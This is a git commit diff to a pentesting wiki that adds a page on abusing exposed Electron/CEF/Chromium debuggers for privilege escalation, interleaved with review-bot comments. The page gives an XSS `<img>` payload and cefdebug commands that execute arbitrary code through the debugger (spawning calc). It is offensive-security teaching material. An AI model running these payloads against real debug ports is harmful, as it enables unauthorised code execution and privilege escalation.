GitBook: [master] 378 pages modified

CPol 2020-09-20 22:47:34 +00:00 committed by gitbook-bot
parent 3f541f3133
commit 0f8cae6f14
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
4 changed files with 35 additions and 0 deletions


@ -20,6 +20,7 @@
* [Checklist - Linux Privilege Escalation](linux-unix/linux-privilege-escalation-checklist.md)
* [Linux Privilege Escalation](linux-unix/privilege-escalation/README.md)
* [electron/CEF/chromium debugger abuse](linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md)
* [Escaping from a Docker container](linux-unix/privilege-escalation/escaping-from-a-docker-container.md)
* [Escaping from restricted shells - Jails](linux-unix/privilege-escalation/escaping-from-limited-bash.md)
* [Cisco - vmanage](linux-unix/privilege-escalation/cisco-vmanage.md)
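Review bot: the new entry is filed under linux-unix/privilege-escalation, yet the page it points to demonstrates the technique with Windows artefacts (cefdebug.exe, calc.exe) and the Windows privilege-escalation page touched in this same commit has to reach it through ../../linux-unix/; a platform-neutral location, or at least a note on the page that the technique applies to both, would avoid the cross-tree link. Minor: Electron, CEF and Chromium are product names and the sibling entries capitalise theirs (Docker, Cisco), so the title should read "Electron/CEF/Chromium debugger abuse".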


@ -201,6 +201,7 @@ ps -ef
top -n 1
```
Always check for possible [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](electron-cef-chromium-debugger-abuse.md). **Linpeas** detect those by checking the `--inspect` parameter inside the command line of the process.
Also **check your privileges over the processes binaries**, maybe you can overwrite someone.
### Process monitoring
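Review bot: the detection hint in the added line is incomplete: a command line containing `--inspect` identifies a Node/Electron main process exposing the inspector, but the Chromium/CEF DevTools endpoint that the new page's `/json/new/` example targets is switched on with `--remote-debugging-port=<port>`, so grepping for `--inspect` alone misses that case; suggest "look for `--inspect` or `--remote-debugging-port` in the process command line". Grammar in the same line: "Linpeas detect those" should be "LinPEAS detects those", the first sentence is a comma splice ("running; you could abuse it"), and "maybe you can overwrite someone" should read "maybe you can overwrite one of them".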


@ -0,0 +1,31 @@
# electron/CEF/chromium debugger abuse
If you find any process with **electron, cef or chromium debugger running** and listening to a port you should try to make the **debugger execute arbitrary commands**.
Abusing this behaviour you **could be able to escalate privileges**.
The abuse of this vulnerability remotely could be as easy as injecting via XSS this line of JS:
```markup
<img src="http://localhost:40000/json/new/?javascript:require('child_process').spawnSync('calc.exe')">
```
But obviously the exploitation will be **much easier locally**, as you can use a tool such as: [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefdebug)\*\*\*\*
```bash
#List possible vulnerable sockets
./cefdebug.exe
#Check if possibly vulnerable
./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code "process.version"
#Exploit it
./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code "process.mainModule.require('child_process').exec('calc')"
```
## References
* [https://www.youtube.com/watch?v=iwR746pfTEc&t=6345s](https://www.youtube.com/watch?v=iwR746pfTEc&t=6345s)
* [https://github.com/taviso/cefdebug](https://github.com/taviso/cefdebug)
* [https://iwantmore.pizza/posts/cve-2019-1414.html](https://iwantmore.pizza/posts/cve-2019-1414.html)
* [https://bugs.chromium.org/p/project-zero/issues/detail?id=773](https://bugs.chromium.org/p/project-zero/issues/detail?id=773)
* [https://bugs.chromium.org/p/project-zero/issues/detail?id=1742](https://bugs.chromium.org/p/project-zero/issues/detail?id=1742)
* [https://bugs.chromium.org/p/project-zero/issues/detail?id=1944](https://bugs.chromium.org/p/project-zero/issues/detail?id=1944)
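Review bot: the `<img>` payload needs its preconditions spelled out: a GET to `/json/new/?javascript:...` is the Chromium remote-debugging HTTP interface opening a new target that navigates to the javascript: URL, so it only works when that interface is listening on the guessed port and the new target has Node integration for `require('child_process')`; likewise port 40000, port 3585 and the UUID path in the cefdebug commands are per-instance values the reader has to copy from the `./cefdebug.exe` listing, and the text should say so rather than present them as fixed. The `--code "process.version"` step is a good liveness check and deserves one sentence explaining that a version string back confirms arbitrary JS execution in a Node context. Smaller points: the trailing `\*\*\*\*` after the cefdebug link is Markdown-escape residue and should be dropped, and `cefdebug.exe`/`calc` make this a Windows walkthrough although the file lives under linux-unix, so either state the platform or add the Linux invocation.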


@ -404,6 +404,8 @@ Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "sv
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
```
Always check for possible [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](../../linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md).
#### Checking permissions of the processes binaries
```bash
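Review bot: the added line tells the reader to check for debuggers but, unlike the Linux hunk in this commit, gives no way to spot them; since the query just above already enumerates Win32_Process, suggest adding the command-line check right there, e.g. `Get-WmiObject Win32_Process | Where-Object { $_.CommandLine -match '--inspect|--remote-debugging-port' } | Select-Object ProcessId, Name, CommandLine`. Also the link reaches across the tree to ../../linux-unix/... for a page whose own examples are Windows tools (cefdebug.exe), which argues for housing that page somewhere platform-neutral.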